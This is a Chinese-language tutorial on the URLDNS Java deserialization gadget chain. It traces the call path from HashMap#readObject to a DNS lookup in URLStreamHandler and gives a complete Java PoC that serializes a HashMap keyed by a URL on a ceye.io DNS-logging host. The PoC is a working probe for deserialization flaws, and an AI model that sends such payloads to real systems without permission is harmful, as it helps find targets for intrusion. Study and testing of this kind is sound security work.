URLDNS

Java
,

前言

URLDNS使⽤Java内置的类构造,对第三⽅库没有依赖,只依赖原生类,没有JDK版本限制。它不会执行命令,只会触发DNS解析,因此通常用来探测是否存在反序列化漏洞。

调用链

1
HashMap#readObject -> HashMap#put -> HashMap#putVal -> HashMap#hash -> URL#hashcode -> URLStreamHandler#hashcode -> URLStreamHandler#getHostAddress

分析

在Java内置的java.net.URL类中,在的equals方法和hashCode方法都具有一个有趣的特性,在对URL对象进行比较时(使用equals方法或hashCode方法)会触发一次DNS解析

java.net.URL#equals方法重写了Object的判断,调用java.net.URLStreamHandler#equals方法进行判断,java.net.URLStreamHandler#equals方法先判断URL对象的锚点(引用)是否相同,并调用java.net.URLStreamHandler#sameFile方法比较传入的两个URL对象

java.net.URLStreamHandler#sameFile方法中对URL对象的协议、文件名和端口号和主机名进行比较。

java.net.URLStreamHandler#sameFile方法调用java.net.URLStreamHandler#hostsEqual方法进行主机名比较,其中调用java.net.URLStreamHandler#getHostAddress方法对要比较的两个URL进行请求解析IP地址并比较,通过java.net.InetAddress#getByName方法对host进行解析,从而触发DNS请求。

java.net.URL#hashcode将一个对象映射为一个整型的值,调用java.net.URLStreamHandler#hashcode方法。

java.net.URLStreamHandler#hashcode方法通用会调用java.net.URLStreamHandler#getHostAddress方法,从而触发DNS请求。

接着需要找一个能够触发到java.net.URL#equals方法或java.net.URL#hashcode方法的点,这里利用Java内置的类HashMap或者HashTable都行。

POC

在PoC中,先自定义了URLStreamHandler的子类SilentURLStreamHandler,在初始化URL对象时传入,那么在HashMap#put方法触发的hash计算在调用到URLStreamHandler#getHostAddress方法时,将调用自定义的SilentURLStreamHandler#getHostAddress方法,从而避免在序列化过程中触发DNS查询,而put之后则是利用反射将URL对象的hashCode的值重新改为-1,从而来满足java.net.URL#hashcode方法要求,完成后续触发。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
package org.example.deserialize.urldns;

import java.io.*;
import java.lang.reflect.Field;
import java.net.*;
import java.util.HashMap;

public class URLDNSDeserialize {

    public static void main(String[] args) throws Exception {

        SilentURLStreamHandler silentURLStreamHandler = new SilentURLStreamHandler();
        HashMap<Object, Object> hashMap = new HashMap<>();
        URL url = new URL(null, "http://fgtee4.ceye.io", silentURLStreamHandler);
        hashMap.put(url, 0);

        Field hashCode = Class.forName("java.net.URL").getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        hashCode.set(url, -1);

        try {
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
            outputStream.writeObject(hashMap);
            outputStream.flush();
            outputStream.close();

            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
            ObjectInputStream inputStream = new ObjectInputStream(byteArrayInputStream);
            inputStream.readObject();
            inputStream.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    static class SilentURLStreamHandler extends URLStreamHandler {

        @Override
        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        @Override
        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }
}